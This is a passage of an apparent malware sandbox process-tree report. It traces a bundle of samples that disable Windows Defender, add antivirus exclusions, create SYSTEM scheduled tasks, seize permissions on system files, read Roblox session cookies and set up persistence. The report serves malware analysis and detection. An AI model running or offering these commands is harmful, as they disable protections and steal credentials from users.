                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                11⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:1884
                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                  12⤵
                                                                                                                                    PID:6688
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /CREATE /TN "bbpyUPajliEPwEthVj" /SC once /ST 19:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF364.tmp\Install.exe\" z3 /VdidyuOe 385104 /S" /V1 /F
                                                                                                                              9⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:756
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 952
                                                                                                                              9⤵
                                                                                                                              • Program crash
                                                                                                                              PID:6528
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f /im taskmgr.exe
                                                                                                                  3⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1812
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\wimloader.dll
                                                                                                                  wimloader.dll
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5468
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_fd64890a-e3da-44d0-9b4b-1e3156252a43\caller.cmd" "
                                                                                                                    4⤵
                                                                                                                      PID:5380
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\ac3.exe
                                                                                                                    ac3.exe
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5364
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping trustsentry.com -t -n 1 -s 4 -4
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:1856
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping ya.ru -t -n 1 -s 4 -4
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:2956
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping tria.ge -t -n 1 -s 4 -4
                                                                                                                    3⤵
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:4084
                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                    xcopy bloatware C:\Users\Admin\Desktop
                                                                                                                    3⤵
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:5932
                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                    xcopy beastify.url C:\Users\Admin\Desktop
                                                                                                                    3⤵
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:4796
                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                    xcopy shell1.ps1 C:\Users\Admin\Desktop
                                                                                                                    3⤵
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:4848
                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                    takeown /R /F C:\Windows\explorer.exe
                                                                                                                    3⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:2764
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls c:\Windows\explorer.exe /grant Admin:(F)
                                                                                                                    3⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:1816
                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                    takeown /R /F C:\Windows\System32\dwm.exe
                                                                                                                    3⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    • Modifies file permissions
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2224
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
                                                                                                                    3⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:4328
                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                    xcopy xcer.cer C:\Users\Admin\Desktop
                                                                                                                    3⤵
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:5264
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 15
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5836
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 15
                                                                                                                    3⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:3388
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\freebobux.exe
                                                                                                                    freebobux.exe
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5552
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D898.tmp\freebobux.bat""
                                                                                                                      4⤵
                                                                                                                        PID:676
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D898.tmp\CLWCP.exe
                                                                                                                          clwcp c:\temp\bg.bmp
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Sets desktop wallpaper using registry
                                                                                                                          PID:6044
                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\D898.tmp\x.vbs"
                                                                                                                          5⤵
                                                                                                                            PID:5488
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\SolaraBootstraper.exe
                                                                                                                        SolaraBootstraper.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:1672
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1676
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                          4⤵
                                                                                                                          • Drops file in Drivers directory
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5516
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            "wmic.exe" csproduct get uuid
                                                                                                                            5⤵
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:6148
                                                                                                                          • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                            5⤵
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:6380
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                                                                            5⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:6512
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                            5⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:6372
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                            5⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:6184
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                            5⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:3548
                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                            "wmic.exe" os get Caption
                                                                                                                            5⤵
                                                                                                                              PID:6556
                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                              "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                              5⤵
                                                                                                                                PID:1176
                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                5⤵
                                                                                                                                  PID:5644
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                  5⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:5724
                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                  "wmic" path win32_VideoController get name
                                                                                                                                  5⤵
                                                                                                                                  • Detects videocard installed
                                                                                                                                  PID:6288
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    6⤵
                                                                                                                                      PID:6280
                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                                                                                    5⤵
                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                    PID:2784
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping localhost
                                                                                                                                      6⤵
                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                      • Runs ping.exe
                                                                                                                                      PID:5184
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Drops startup file
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  PID:1372
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6828
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /f /im ctfmon.exe
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:5364
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\wim.dll
                                                                                                                                wim.dll
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2580
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_64cc5728-34a0-4406-8a3a-fecd923bf16d\load.cmd" "
                                                                                                                                  4⤵
                                                                                                                                    PID:4932
                                                                                                                                    • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                                                                                      "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_64cc5728-34a0-4406-8a3a-fecd923bf16d\cringe.mp4"
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:5428
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\web2.htm
                                                                                                                                  3⤵
                                                                                                                                    PID:6660
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                                                                                                                                      4⤵
                                                                                                                                        PID:6680
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\xcer.cer
                                                                                                                                      3⤵
                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                      PID:6792
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                      f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                      PID:3376
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                                                                                                                        4⤵
                                                                                                                                          PID:1100
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                                                                                                                                            5⤵
                                                                                                                                              PID:6376
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
                                                                                                                                            4⤵
                                                                                                                                              PID:6512
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xb8,0x108,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                                                                                                                                                5⤵
                                                                                                                                                  PID:4384
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                                                                                                4⤵
                                                                                                                                                  PID:6936
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xa8,0x10c,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                                                                                                                                                    5⤵
                                                                                                                                                      PID:6712
                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                  timeout /t 15
                                                                                                                                                  3⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:1320
                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                  xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
                                                                                                                                                  3⤵
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:5496
                                                                                                                                                • C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                  regedit
                                                                                                                                                  3⤵
                                                                                                                                                  • Runs regedit.exe
                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                  PID:6676
                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                  xcopy C:\Windows\WinSxS C:\Users\Admin\Desktop
                                                                                                                                                  3⤵
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:924
                                                                                                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                  xcopy regmess.exe C:\Users\Admin\Desktop
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:6172
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\jaffa.exe
                                                                                                                                                  jaffa.exe
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:3156
                                                                                                                                                  • C:\Windows\SysWOW64\elinkutpnq.exe
                                                                                                                                                    elinkutpnq.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Modifies visibility of file extensions in Explorer
                                                                                                                                                    • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • Disables RegEdit via registry modification
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Windows security modification
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Modifies WinLogon
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:4404
                                                                                                                                                    • C:\Windows\SysWOW64\udsinvvc.exe
                                                                                                                                                      C:\Windows\system32\udsinvvc.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                      PID:6576
                                                                                                                                                  • C:\Windows\SysWOW64\njcobdjkxmhtidm.exe
                                                                                                                                                    njcobdjkxmhtidm.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    PID:5172
                                                                                                                                                  • C:\Windows\SysWOW64\udsinvvc.exe
                                                                                                                                                    udsinvvc.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4708
                                                                                                                                                  • C:\Windows\SysWOW64\sfvsfggqeomew.exe
                                                                                                                                                    sfvsfggqeomew.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3392
                                                                                                                                                  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
                                                                                                                                                    4⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:6572
                                                                                                                                                    • C:\Windows\splwow64.exe
                                                                                                                                                      C:\Windows\splwow64.exe 12288
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2908
                                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\helper.vbs"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3780
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\web3.htm
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5488
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2648
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\jkka.exe
                                                                                                                                                          jkka.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:7048
                                                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                            "C:\Windows\system32\notepad.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Drops startup file
                                                                                                                                                            • NTFS ADS
                                                                                                                                                            PID:6204
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:5540
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4996
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 4996 240734390
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:1388
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /f /im fontdrvhost.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:3096
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\selfaware.exe
                                                                                                                                                          selfaware.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:6352
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\selfaware.exe
                                                                                                                                                            selfaware.exe
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:6776
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls "C:\Users\Admin\AppData\Local\a35bf27b-0a61-4c41-8829-1ec98d3a47bf" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                              5⤵
                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:6180
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\selfaware.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                              5⤵
                                                                                                                                                                PID:2936
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\selfaware.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:6140
